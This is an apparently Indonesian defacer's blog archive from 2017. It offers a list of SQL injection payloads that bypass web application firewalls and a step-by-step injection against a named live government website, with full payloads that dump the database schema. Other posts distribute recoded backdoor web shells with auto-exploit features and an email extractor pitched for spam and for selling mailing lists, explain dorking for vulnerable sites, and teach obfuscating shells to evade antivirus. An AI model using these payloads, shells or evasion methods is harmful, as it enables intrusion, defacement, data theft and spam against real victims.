Wednesday, March 1, 2017

MACAM - MACAM BYPASS WAFF SQLi

[#] Bypass order by [#]

/*!ORDER*/ BY 1
/*!ORDER/**/BY*/ 1
/*!50000ORDER*/ BY 1
/*!50000ORDER BY*/ 1
 /**_**/ORDER/**_**/ /**_**/BY/**_**/  1
/**//**_**/ORDER/**_**//**/ /**//**_**/BY/**_**/ /**/ 1
 /**/OR/**/DER BY  1
 ORDER BY 1
 ORDER BY 1
%0AORDER%0A %0ABY%0A  1
 ORDER BY  (1)--

[#] Bypass Concat() [#]
/*!concat*/()
/*!50000concat*/()
/**//concat/**/()
/**/con/**/cat/**/()
concat/**_**/()
/**_**/concat/**_**/()
concat()
concat()
concat()
%0Aconcat()
concat%0A()
%0Aconcat%0A()

[#] Bypass Group_concat() [#]
/*!Group_concat*/()
/*!50000group_concat*/()
/**//group_concat/**/()
/**/Gro/**/up_con/**/cat/**/()
group_concat/**_**/()
/**_**/group_concat/**_**/()
group_concat()
group_concat()
group_concat()
%0Agroup_concat()
group_concat%0A()
%0Agroup_concat%0A()
[#] Bypass version() [#]
/*!version*/()
/*!50000version*/()
/**//version/**/()
/**/ver/**/sion/**/()
version/**_**/()
/**_**/version/**_**/()
version()
version()
version()
%0Aversion()
version%0A()
%0Aversion%0A()

[#]Bypass database()[#]
/*!database*/()
/*!50000database*/()
/**//database/**/()
/**/data/**/base/**/()
database/**_**/()
/**_**/database/**_**/()
database()
database()
database()
%0Adatabase()
database%0A()
%0Adatabase%0A()

[#]Bypass user()[#]
/*!user*/()
/*!50000user*/()
/**//user/**/()
/**/us/**/er/**/()
user/**_**/()
/**_**/user/**_**/()
user()
user()
user()
%0Auser()
user%0A()
%0Auser%0A()

[#]Bypass from [#]
/*!from*/
/*!50000from*/
from
from
%0Afrom
from%0A
%0Afrom%0A
%0ATWA%0Afrom%0ATWA%0A

[#]Bypass information_schema.columns [#]
/*!information_schema.columns*/
/*!information_schema*/.columns
/*!50000information_schema*/.columns
/*!50000information_schema.columns*/
/**_**/information_schema/**_**/.columns
/**/information_schema/**/.columns
/**/information_sch/**/ema/**/.columns
information_sch/**/ema.columns
information_schema.columns
%0Ainformation_schema.columns

[#]Bypass union select [#]
/*!%55NiOn*/ /*!%53eLEct*/

 %55nion(%53elect 1,2,3)-- -

 +union+distinct+select+

 +union+distinctROW+select+

 /**//*!12345UNION SELECT*//**/

 /**//*!50000UNION SELECT*//**/

 /**/UNION/**//*!50000SELECT*//**/

 /*!50000UniON SeLeCt*/

 union /*!50000%53elect*/

 +#uNiOn+#sEleCt

 +#1q%0AuNiOn all#qa%0A#%0AsEleCt

 /*!%55NiOn*/ /*!%53eLEct*/

 /*!u%6eion*/ /*!se%6cect*/

 +un/**/ion+se/**/lect

 uni%0bon+se%0blect

 %2f**%2funion%2f**%2fselect

 union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A

 REVERSE(noinu)+REVERSE(tceles)

 /*--*/union/*--*/select/*--*/

 union (/*!/**/ SeleCT */ 1,2,3)

 /*!union*/+/*!select*/

 union+/*!select*/

 /**/union/**/select/**/

 /**/uNIon/**/sEleCt/**/

 /**//*!union*//**//*!select*//**/

 /*!uNIOn*/ /*!SelECt*/

 +union+distinct+select+

 +union+distinctROW+select+

 +UnIOn%0d%0aSeleCt%0d%0a

 UNION/*&test=1*/SELECT/*&pwn=2*/

 un?+un/**/ion+se/**/lect+

 +UNunionION+SEselectLECT+

 +uni%0bon+se%0blect+

 %252f%252a*/union%252f%252a /select%252f%252a*/

 /%2A%2A/union/%2A%2A/select/%2A%2A/

 %2f**%2funion%2f**%2fselect%2f**%2f

 union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A

 /*!UnIoN*/SeLecT+

UNION SELECT

UNION SELECT
 
UNION SELECT
 
UNION SELECT
 
%0AUNION%0ASELECT%0A


sumber : https://www.owasp.org/index.php/SQL_Injection_Bypassing_WAF

SQLi Bypass From atau information_schema

udah lama sekali ya saya tidak membuat artikel tentang SQLi.
oke kali ini saya akan membahas bagaimana cara menghadapi saat melakukan dios malah kena 403 forbiden.

selain itu saya juga akan memberikan sedikit trick untuk mengetahui query yang terkena filter pada saat SQLi.

oke langsung saja :
live target : http://upt-pth.dishut.jatimprov.go.id/layanan.php?id=1

skip saat melakukan injek point dan order by karena saya yakin kalian sudah tau caranya.

dalam target itu saya menemukan jumlah columnya adalah sebanyak 7 column
dan saya langsung melakukan union select sebanyak 7 column.
dan hasilnya
 
upps forbiden.

oke di saat seperti ini mari kita cari tahu query mana yg kena filter.
caranya adalah dengan melakukan kata perkata :
id=1 union 1,2,3,4,5,6,7  -- - ( No error )
id=1 select 1,2,3,4,5,6,7  -- - (No error)

id=1 union select 1,2,3,4,5,6,7  -- - (error)
jadi kesimpulanya adalah web tersebut menggunakan filter terhadap query union select.
jadi saya akan mencoba membypass salah satu querynya.
di sini saya membypass di bagian union sehingga menjadi.
id=-1 union /*!50000select*/ 1,2,3,4,5,6,7  --
dan hasilnya terlihat angka ajaibnya muncul
 
angka yg muncul adalah 4 daan 6

mari kita coba langsung menggunakan DIOS pada angka tersebut.
hasilnya
 
upss muncul Forbiden again saat saya melakukan dios.

mari kita cari tahu di query mana yg terkena filter di web tersebut.
id=-1 union /*!50000select*/ 1,2,3,concat(),5,6,7  -- ( No error)
id=-1 union /*!50000select*/ 1,2,3,concat(version()),5,6,7  -- (No error dan menampilkan versinya)

id=-1 union /*!50000select*/ 1,2,3,concat(version(),database()),5,6,7  -- (Error)

ternyata query database() terkena filter di web tersebut, oke saya akan melakukan bypass terhadap database().
langsung aja lah tanpa basa basi saya menggunakan bypass seperti ini database/**_**/() dan hasilnya adalah

kita bisa lihat hasilnya kita mendapatkan nama database web tersebut :D
oke kita lanjut.

saya akan menambahkan table_name dan column_name
seperti ini
id=-1 union /*!50000select*/ 1,2,3,concat(version(),0x3c62723e,database/**_**/(),table_name,column_name),5,6,7  -- -
dan hasilnya saya menemukan error again :(

oke dari penambahan query table_name dan column_name ternyata kena filter pada web tersebut
saya akan membypass query yg terkena filter tersebut seperti ini :
id=-1 union /*!50000select*/ 1,2,3,concat(version(),0x3c62723e,database/**_**/(),/*!50000table_name*/,/*!50000column_name*/),5,6,7  -- -
dan hasilnya
 
kita bisa lihat hasilnya web kembali normal tidak Forbiden lagi, namun versi dan nama database web tersebut menghilang.
jangan khawatir versi dan database itu menghilang karena kita menmabhkan query table_name dan column_name saja sehingga web tersebut tidak mengetahui table dan column yg mana yg akan ditampilkan sehingga versi dan nama database tersebut menghilang.

oke lanjut saya akan menambhkan query From di blangka angka
id=-1 union /*!50000select*/ 1,2,3,concat(version(),0x3c62723e,database/**_**/(),/*!50000table_name*/,/*!50000column_name*/),5,6,7 from  -- -
dan hasilnya adalah

wtf error again saat penambahan query from -,- berarti web ini memfilter query from -,-
gampang gampang susah si untuk membypass query from ini

oke saya akan mencoba mebypass query from seperti ini :
id=-1 union /*!50000select*/ 1,2,3,concat(version(),0x3c62723e,database/**_**/(),/*!50000table_name*/,/*!50000column_name*/),5,6,7 /*!50000from*/  -- - (error)

id=-1 union /*!50000select*/ 1,2,3,concat(version(),0x3c62723e,database/**_**/(),/*!50000table_name*/,/*!50000column_name*/),5,6,7 %0Afrom%0A  --  (error)

id=-1 union /*!50000select*/ 1,2,3,concat(version(),0x3c62723e,database/**_**/(),/*!50000table_name*/,/*!50000column_name*/),5,6,7 from  -- - (error)

id=-1 union /*!50000select*/ 1,2,3,concat(version(),0x3c62723e,database/**_**/(),/*!50000table_name*/,/*!50000column_name*/),5,6,7 /*!from*/  -- - (error)


fak men muncul error terus :(
lalu bagaimana cara Bypass from kalo segala bypass malah error mulu?
oke saya akan melakukan sedikit trick dalam SQLi

yaitu dengan cara menambahkan @s di dalam concat jadinya seperti ini :
id=-1 union /*!50000select*/ 1,2,3,concat(version(),0x3c62723e,database/**_**/(),0x3c62723e,@s),5,6,7  -- -
  
dan hasilnya web seperti semula akan tetapi masih menghilang versi dan nama databsenya.
oke lanjut saya akan menambahkan query andalan saya di saat menemukan kasus seperti ini
yaitu querynya :
div@s:=(concat(@c:=0x00,if((select count(*)/*!50000from*//*!50000information_schema*/.columns where table_schema=database/**X**/() and @c:=concat(@c,0x3c62723e,/*!50000table_name*/,0x3a3a3a3a3e,/*!50000column_name*/)),0x00,0x00),@c))

query ini berguna seperti DIOS pada sqli namun menempatkan query ini di depan union select
bisa di perhatikan dari query tersebut, yg mana saja query yg terkana filter pasti saya melakukan bypass.

menjadi seperti ini querynya
id=-1 div@s:=(concat(@c:=0x00,if((select count(*)/*!50000from*//*!50000information_schema*/.columns where table_schema=database/**X**/() and @c:=concat(@c,0x3c62723e,/*!50000table_name*/,0x3a3a3a3a3e,/*!50000column_name*/)),0x00,0x00),@c)) /*!50000Union*/ Select 1,2,3,concat(version(),0x3c62723e,database/**_**/(),0x3c62723e,@s),5,6,7 -- -

sehingga hasilnya seperti ini :
 


dan tara hasilnya kita mendapatkan table dan column database web tersebut.
hasil akhirnya seperti ini :

http://upt-pth.dishut.jatimprov.go.id/layanan.php?id=-1 div@s:=(concat(@c:=0x00,if((select count(*)/*!50000from*//*!50000information_schema*/.columns where table_schema=database/**X**/() and @c:=concat(@c,0x3c62723e,/*!50000table_name*/,0x3a3a3a3a3e,/*!50000column_name*/)),0x00,0x00),@c)) /*!50000Union*/ Select 1,2,3,concat(0x3c6833207374796c653d27666f6e742d73697a653a323070783b746578742d736861646f773a20327078203270782035707820617175613b273e,0x5175657279204279206f7269653430343c2f68333e,0x3c62723e,0x3c666f6e7420636f6c6f723d7265643e,0x76657273696f6e,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d626c75653e,0x3a3a3a3a3e,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d7265643e,version(),0x3c2f666f6e743e,0x3c62723e,0x3c666f6e7420636f6c6f723d677265656e3e,0x75736572,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d626c75653e,0x3a3a3a3a3e,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d677265656e3e,user/**_**/(),0x3c2f666f6e743e,0x3c62723e,0x3c666f6e7420636f6c6f723d6d6167656e74613e,0x6461746162617365,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d626c75653e,0x3a3a3a3a3e,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d6d6167656e74613e,database/**_**/(),0x3c2f666f6e743e,0x3c62723e,0x3c6833207374796c653d27666f6e742d73697a653a323070783b746578742d736861646f773a203270782032707820357078207265643b273e,@s),5,6,7 -- -


   
oke skian dahulu tutorial kali ini.
semoga membantu tutorial kali ini

Friday, February 24, 2017

Shell IndoXploit V.2 Recode

Sesuai janji saya ke salah satu seseorang yg meminta shell indoxploit di tambah fitur auto exploit dan bypass symlink.

dan kali ini saya akan merecode sederhana shell IndoXploit V.2 dengan penambahan fitur
  1. Bypass Symlink
  2. Auto Exploit Com_users
  3. Auto Exploit Elfinder
  4. Auto Exploit Prestashop 1.6 Vulnerable File Upload
  5. Auto Exploit PrestaShop Modules Blocktestimonial File Upload
  6. Serta Cara Pemakaiannya sudah ada di masing - masing menu. 
1. Tampilan Bypass Symlink


2. Tampilan Auto Exploit Com_users
  

3. Tampilan Auto Exploit Elfinder
 

4. Tampilan Auto Exploit Prestashop 1.6 Vulnerable File Upload
 
5. Tampilan Auto Exploit PrestaShop Modules Blocktestimonial File Upload
 

Gimana menarik bukan ?
sekrang udah bisa satu paket jika udah upload shell otomatis segala exploit yg ada bakalan langsung ada tinggal di pakai saja :D

dan 1 lagi untuk mengetahui cara login shellnya baca di artikel sbelumnya :D

Bagi yang ingin memiliki shell ini bisa download di sini : Download

Pass Shell : IndoXploit

Terima kasih sudah mengunjungi blog saya :D

Friday, February 3, 2017

shell IndoXploit v.2

Kali ini saya ingin berbagi hasil karya saya yaitu shell IndoXploit yg telah saya recode dan penambahan fitur :D

Penambahan fiturnya yaitu :
  1. Mirror Defacerid
  2. Email Extractror
  3. Mailer Sender
memang ga banyak untuk penambahan fiturnya tapi ini.

untuk tamplan shell

 

Menu Login shell
 


Tampilan Email extractor

 

Tampilan Mailer / Email Sender


cara kerja Email extractor yaitu hanya drop email d dalam database, ini berguna untuk orang yang sedang mencari mailist untuk spaming dan bisa juga mailist yg kita dapet d jual ke oran spammer  :D

anda bisa mendownload SINI 

pass shell : orie404

Wednesday, January 11, 2017

Shell IDT

Kali ini saya meng recode shell b374k dengan logo IDT ( Indonesia Defacer Tersakiti ).
oke langsung saja.

Untuk tampilan menu login shell :
 


Dan tampilan menu shellnya :
 

Jika anda tertarik dengan shell ini, anda bisa mendownloadnya di sini :


pass : IDT

Bagi yang ingin request untuk recode shell untuk keprluan tim atau untuk diri anda sendiri bisa chat saya.

Saturday, January 7, 2017

Cara mengembangkan Dork

Mungkin seorang defacer sudah mengenal yang namanya dorking namun ada suatu ketika kita bingung stuck untuk mengembangkan sebuah dork.

terus bagaimana si mengembangkan sebuah dork ?
oke kali ini saya akan membahasnya.

seblom kita mengembamngkan sebuah dork alngkah baiknya kita mengerti apa yg di maksud :
  1. inurl / allinurl     = untuk mencari  string pada url.
  2. intext / allintext = untuk mencari nilai string ( text ) pada web.
  3. intitle / allintitle  = untuk mencari judul atau title pada website.
  4. site                  = untuk mencari pada web tertentu saja.
  5. ext                   = untuk mencari extensi pada web ( bagi yang ga tau  Ekstensi dari sebuah file adalah    karakter yang terletak setelah titik terakhir dalam sebuah nama file. seperti .html .php .asp .txt dll )
 contoh penggunaan :
  1. inurl / allinurl      = inurl:blabla/blabla/.../blabla
  2. intext / all intext  = intext:"blabla" atau intext:blabla
  3. intitle                = intitle:blabal
  4. site                   = site:id, site:com dll
  5. ext                   = ext:html, ext:php, ext:asp, dll

di sini saya akan menggunakan dork di atas.

saya akan mencoba untuk dork untuk SQLi Base64 yaitu :
inurl:product.php?id=MQ== 
hasil dari dork tersebut :
 
 kita bisa lihat hasil dari dork tersebut yaitu 51 hasil.
coba kita menggunakan allinurl : pada dork tersebut
 inurl:product.php?id=MQ==
hasli dari dork tesebut :
 kita bisa lihat ada perubahan hasil yang tadinya mendaptkan 51 hasil kini menjadi 48 hasilnya.
sekarang kita coba untuk memilih salah satu website dan kita akan mencoba mengembangkan dork dari url web tersebut.

di sini saya mencoba pilih website yang paling atas dan meliha - lihat isi website tersebut :
hal pertama yang saya lakukan ialah melihat masing - masing menu yang ada di web tersebut dan melihat urlnya sperti ini :

  
Kita bisa lihat website tersebut dan menampilkan sebuah url yang berbeda - beda
di sini saya akan mencoba mengambil url salah satu menu pada tersebut ialah :

http://www.chakshueng.com/product.php?id=MTE=

dan saya akan mengambil url web terbut untuk saya jadikan dork ( bukan webnya ).
urlnya ialah :
product.php?id=MTE=

dan kita lihat berpa hasil dari dork tersebut :
 


Disitu kita bisa lihat hasil dari dork url web tersbut ialah hanya menghasilkan 17 hasil saja :(
bagamina kita akan coba menghpus product.php? dan hanya menjadi inurl:id=MTE= kita lihat hasilnya.

 
 dan wow dorknya menghasilkan sekitar 3,030 hasil :D
banyak juga ya.

dan kita akan mencoba untuk menggunakan allinurl:id=MTE=
 
Kita bisa lihat hasilnya yaitu sekitar 3,040 hasil.

sudah paham ya kegunaan inurl dan allinurl ? pastinya sudah paham kan :D

oke saya kasih clue dan anda mudah - mudahan anda bisa mengerti.
  1.  Bisa menggunakan @copyright pada suatu website.
  2.  Bisa menggunakan Url  pada menu website.
  3.  Bisa menggunakan title pada menu login website.
  4.  Bisa menggunakan extensi pada Url website.
  5.  Bisa menggunakan  text - text tententu pada website.
oke sekian dan terimakasih sudah ingin membaca artikel saya semoba bermanfaat artikel yang saya buat ini.

NB : Segala kritik dan saran akan saya terima dengan senang hati, dan yang ingin bertanya - tanya silakan chat saya (fast respont ).

Friday, January 6, 2017

Cara Encode / Encrypt Shell Backdoor

Maaf seblomnya saya sudah lama tidak membuat artikel.
dan kali ini saya ingin membuat artikel tentang bagaimana cara Encode / Encrypt Shell Backdoor sehingga tak terdetksi sebagai virus.

di sini saya punya shell backdoor IndoXploit original dan hasil yang sudah saya recode.

oke di sini saya akan membandingkan Shell IndoXploit original dan yang telah di reode dan di Encrypt sama saya di total virus.
                                                            Shel IndoXploit_v2 ( original )

                           Shell IndoXploit_v2 ( yang telah di recode dan Encrypt / Encoding )

dari situ terlihat jelas bukan perbedaan yang paling mencolok dari beberpa software antivirus kalo shell backdoor IndoXploit ( original ) bakalan kedetksi sebagai firus di beberapa software antivirus.

Oke langsung saja.
  1. yang paling utama adalah shell backdoor kesayangan anda.
  2. Kunjungi webssite ini  fopo.com untuk Encode Shell anda.
caranya :
  1. Buka shell anda di Notepad++ seperti ini
   


    2. Kemudian Copy dan Paste script Shell anda di colum website yang sudah saya tunjukan seperti ini :
  

   Setelah Paste Script anda pada colum yang sebalah kiri nanti secara otomatis web tersebut akan langsung men Encode script anda. dan ini hasil dari Encodenya :
 

setelah mendapatkan shell yang telah di Encode anda tinggal copy paste saja.
dan anda bisa membandingkan shell anda yang seblom di encode dan sesudah di encode di website virus total.

Dan bagi anda yang tidak mau repot untuk menencode shell anda di sini saya menyediakan shell hasil recode saya yang original dan yang telah saya recode :

Untuk menu login shell sengaja saya buat seperti halaman error untuk mengecoh orang yang ingin mencoba akses shell anda.


Tampilan shell yang telah saya recode.
 

IndoXploit_v2 ( original )      Download
IndoXploit_v2 ( Encoding )  Download

Password : IndoXploit

Sekian Tutorial Cara Encrypt / Encode Shell Backdoor.
 
Cool Blue Outer Glow Pointer